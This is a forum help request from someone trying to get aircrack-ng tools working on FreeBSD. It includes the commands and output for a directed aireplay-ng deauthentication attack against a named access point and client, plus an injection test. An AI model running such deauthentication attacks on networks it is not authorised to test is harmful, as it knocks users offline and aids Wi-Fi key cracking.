aireplay-ng not working...

After playing with aircrack-ng on Kali Linux, I would like to figure out how it can be done in FreeBSD environment.

1. recreating wlan0 in ad hoc mode
Code:
ifconfig wlan0 destroy
ifconfig wlan0 create wlandev ath0 wlanmode ahdemo
2. start airodump-ng
airodump-ng wlan0 -w abc -c 6

3. use aireplay-ng to cause deauthentication
Code:
aireplay-ng -0 2 -a 28:E3:1F:5A:55:92 -c 00:19:7E:C8:7F:E6 wlan0
19:28:01  Waiting for beacon frame (BSSID: 28:E3:1F:5A:55:92) on channel 6
19:28:02  Sending 64 directed DeAuth. STMAC: [00:19:7E:C8:7F:E6] [ 0| 0 ACKs]
19:28:02  Sending 64 directed DeAuth. STMAC: [00:19:7E:C8:7F:E6] [ 0| 0 ACKs]
I have problems with this. With Kali, the ACK numbers are non-zero; with FreeBSD these numbers are always zeros.

Here is the output for injection test:
Code:
aireplay-ng -9 wlan0
19:29:07  Trying broadcast probe requests...
19:29:07  Injection is working!
19:29:09  Found 2 APs

19:29:09  Trying directed probe requests...
19:29:09  28:E3:1F:5A:55:92 - channel: 6 - 'ryan'
wi_write(): Input/output error
wi_write(): Input/output error
wi_write(): Input/output error
wi_write(): Input/output error
wi_write(): Input/output error
I have googled around online, but found no answer. Any pointer is appreciated.
 
Back
Top